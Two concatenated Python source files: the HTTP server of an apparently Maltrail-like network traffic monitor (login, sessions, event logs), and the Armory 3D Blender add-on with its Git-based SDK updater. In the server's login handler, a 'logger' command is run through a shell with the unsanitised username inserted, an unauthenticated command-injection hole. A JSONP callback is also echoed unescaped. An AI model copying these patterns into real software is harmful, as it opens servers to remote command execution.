import threading
import time
import traceback
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.compat import xrange
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import IS_WIN
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from thirdparty import six
from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer
from thirdparty.six.moves import http_client as _http_client
from thirdparty.six.moves import socketserver as _socketserver
from thirdparty.six.moves import urllib as _urllib
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
_fail2ban_cache = None
_fail2ban_key = None
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
_BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
if six.PY2:
import OpenSSL # pyopenssl
ThreadingServer.__init__(self, server_address, HandlerClass)
for method in ("TLSv1_2_METHOD", "TLSv1_1_METHOD", "TLSv1_METHOD", "TLS_METHOD", "SSLv23_METHOD", "SSLv2_METHOD"):
if hasattr(OpenSSL.SSL, method):
ctx = OpenSSL.SSL.Context(getattr(OpenSSL.SSL, method))
break
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
else:
import ssl
ThreadingServer.__init__(self, server_address, ReqHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(pem, pem)
self.socket = ctx.wrap_socket(socket.socket(self.address_family, self.socket_type), server_side=True)
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
pass
class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(_urllib.parse.parse_qs(self.data))
if query:
params.update(_urllib.parse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, 'r').read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
if ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(_http_client.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = content or open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
# For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src * blob:; script-src 'self' 'unsafe-eval' https://stat.ripe.net; frame-src *; object-src 'none'; block-all-mixed-content;")
if os.path.basename(path) == "index.html":
content = re.sub(b'\s*<script[^>]+src="js/demo.js"></script>', b'', content)
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(_http_client.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = b'<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
if isinstance(content, six.text_type):
content = content.encode(UNICODE_ENCODING)
for match in re.finditer(b"<\\!(\\w+)\\!>", content):
name = match.group(1).decode(UNICODE_ENCODING)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{name: _()})
if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = six.BytesIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
try:
if content:
self.wfile.write(content)
self.wfile.flush()
except:
pass
def do_POST(self):
length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length)).decode(UNICODE_ENCODING)
data = _urllib.parse.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
if retval is None and not config.USERS:
retval = AttribDict({"username": "?"})
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return "%s/%s" % (NAME, self._version())
def end_headers(self):
if not hasattr(self, "_headers_ended"):
_BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
_BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
version = VERSION
try:
for line in open(os.path.join(os.path.dirname(__file__), "settings.py"), 'r'):
match = re.search(r'VERSION = "([^"]*)', line)
if match:
version = match.group(1)
break
except:
pass
return version
def _statics(self):
latest = max(glob.glob(os.path.join(os.path.dirname(__file__), "..", "trails", "static", "malware", "*.txt")), key=os.path.getmtime)
return "/%s" % datetime.datetime.fromtimestamp(os.path.getmtime(latest)).strftime(DATE_FORMAT)
def _logo(self):
if config.HEADER_LOGO:
retval = config.HEADER_LOGO
else:
retval = '<img src="images/mlogo.png" style="width: 25px">altrail'
return retval
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING))
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
try:
uid = int(uid)
except ValueError:
uid = None
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
_ = os.urandom(SESSION_ID_LENGTH)
session_id = _.hex() if hasattr(_, "hex") else _.encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", '*', "::", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not IS_WIN:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(_http_client.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(config.TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _fail2ban(self, params):
global _fail2ban_cache
global _fail2ban_key
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = ""
key = int(time.time()) >> 3
if config.FAIL2BAN_REGEX:
try:
re.compile(config.FAIL2BAN_REGEX)
except re.error:
content = "invalid regular expression used in option FAIL2BAN_REGEX"
else:
if key == _fail2ban_key:
content = _fail2ban_cache
else:
result = set()
_ = os.path.join(config.LOG_DIR, "%s.log" % datetime.datetime.now().strftime("%Y-%m-%d"))
if os.path.isfile(_):
for line in open(_, "r"):
if re.search(config.FAIL2BAN_REGEX, line, re.I):
result.add(line.split()[3])
content = "\n".join(result)
_fail2ban_cache = content
_fail2ban_key = key
else:
content = "configuration option FAIL2BAN_REGEX not set"
return content
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print("[!] invalid date format in request")
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print("[!] invalid date format in request")
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None and not session.mask_custom:
session.range_handle.seek(start)
self.send_response(_http_client.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = io.StringIO(), set(), [], ""
for netfilter in session.netfilters or []:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif "\\." in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print("[!] invalid network filter '%s'" % netfilter)
return
for line in session.range_handle:
display = session.netfilters is None
ip = None
line = line.decode(UNICODE_ENCODING, "ignore")
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if session.mask_custom and "(custom)" in line:
line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line)
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(_http_client.OK) # instead of _http_client.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(_http_client.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(_http_client.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * (1 + content.count(b'\n')) * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100.0) * 100)
else:
counts[timestamp] = content.count(b'\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
_BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
try:
if pem:
server = SSLThreadingServer(_address, pem, SSLReqHandler)
else:
server = ThreadingServer(_address, ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print("[i] starting HTTP%s server at http%s://%s:%d/" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1]))
print("[^] running...")
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
bl_info = {
"name": "Armory",
"category": "Render",
"location": "Properties -> Render -> Armory Player",
"description": "3D Game Engine for Blender",
"author": "Armory3D.org",
"version": (0, 6, 0),
"blender": (2, 80, 0),
"wiki_url": "http://armory3d.org/manual",
"tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
bl_idname = __name__
def sdk_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
def ffmpeg_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
def renderdoc_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
sdk_bundled: BoolProperty(name="Bundled SDK", default=True)
sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
show_advanced: BoolProperty(name="Show Advanced", default=False)
player_gapi_win: EnumProperty(
items = [('direct3d11', 'Auto', 'direct3d11'),
('opengl', 'OpenGL', 'opengl'),
('direct3d11', 'Direct3D11', 'direct3d11')],
name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_linux: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_mac: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
code_editor: EnumProperty(
items = [('kodestudio', 'Kode Studio', 'kodestudio'),
('default', 'System Default', 'default')],
name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False)
legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
viewport_controls: EnumProperty(
items=[('qwerty', 'qwerty', 'qwerty'),
('azerty', 'azerty', 'azerty')],
name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
skip_update: BoolProperty(name="", default=False)
def draw(self, context):
self.skip_update = False
layout = self.layout
layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.")
p = bundled_sdk_path()
if os.path.exists(p):
layout.prop(self, "sdk_bundled")
if not self.sdk_bundled:
layout.prop(self, "sdk_path")
else:
layout.prop(self, "sdk_path")
box = layout.box().column()
box.label(text="Armory Updater")
box.label(text="Note: Development version may run unstable!")
row = box.row(align=True)
row.alignment = 'EXPAND'
row.operator("arm_addon.help", icon="URL")
row.operator("arm_addon.update", icon="FILE_REFRESH")
row.operator("arm_addon.restore")
box.label(text="Check console for download progress. Please restart Blender after successful SDK update.")
layout.prop(self, "show_advanced")
if self.show_advanced:
box = layout.box().column()
box.prop(self, "player_gapi_" + get_os())
box.prop(self, "code_editor")
box.prop(self, "renderdoc_path")
box.prop(self, "ffmpeg_path")
box.prop(self, "viewport_controls")
box.prop(self, "ui_scale")
box.prop(self, "khamake_threads")
box.prop(self, "save_on_build")
box.prop(self, "legacy_shaders")
box.prop(self, "relative_paths")
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
if bpy.data.filepath == '':
return ''
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_sdk_path(context):
preferences = context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if os.path.exists(get_fp() + '/armsdk'):
return get_fp() + '/armsdk'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def git_clone(done, p, gitn, n, recursive=False):
if not os.path.exists(p + '/' + n + '_backup'):
os.rename(p + '/' + n, p + '/' + n + '_backup')
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
if recursive:
run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done)
else:
run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done)
def restore_repo(p, n):
if os.path.exists(p + '/' + n + '_backup'):
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
os.rename(p + '/' + n + '_backup', p + '/' + n)
class ArmAddonStartButton(bpy.types.Operator):
'''Start Armory integration'''
bl_idname = "arm_addon.start"
bl_label = "Start"
running = False
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
print("Configure Armory SDK path first")
return {"CANCELLED"}
scripts_path = sdk_path + "/armory/blender/"
sys.path.append(scripts_path)
local_sdk = os.path.exists(get_fp() + '/armsdk')
import start
start.register(local_sdk=local_sdk)
ArmAddonStartButton.running = True
return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
'''Stop Armory integration'''
bl_idname = "arm_addon.stop"
bl_label = "Stop"
def execute(self, context):
import start
start.unregister()
ArmAddonStartButton.running = False
return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.update"
bl_label = "Update SDK"
bl_description = "Update to the latest development version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
self.report({'INFO'}, 'Updating Armory SDK, check console for details.')
print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
os.chdir(sdk_path)
global repos_updated
global repos_total
repos_updated = 0
repos_total = 9
def done():
global repos_updated
global repos_total
repos_updated += 1
if repos_updated == repos_total:
print('Armory SDK updated, please restart Blender')
git_clone(done, sdk_path, 'armory3d/armory', 'armory')
git_clone(done, sdk_path, 'armory3d/iron', 'iron')
git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet')
git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast')
git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui')
git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools')
git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format')
git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom')
git_clone(done, sdk_path, 'armory3d/Kha', 'Kha', recursive=True)
return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.restore"
bl_label = "Restore SDK"
bl_description = "Restore stable version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
os.chdir(sdk_path)
restore_repo(sdk_path, 'armory')
restore_repo(sdk_path, 'iron')
restore_repo(sdk_path, 'lib/haxebullet')
restore_repo(sdk_path, 'lib/haxerecast')
restore_repo(sdk_path, 'lib/zui')
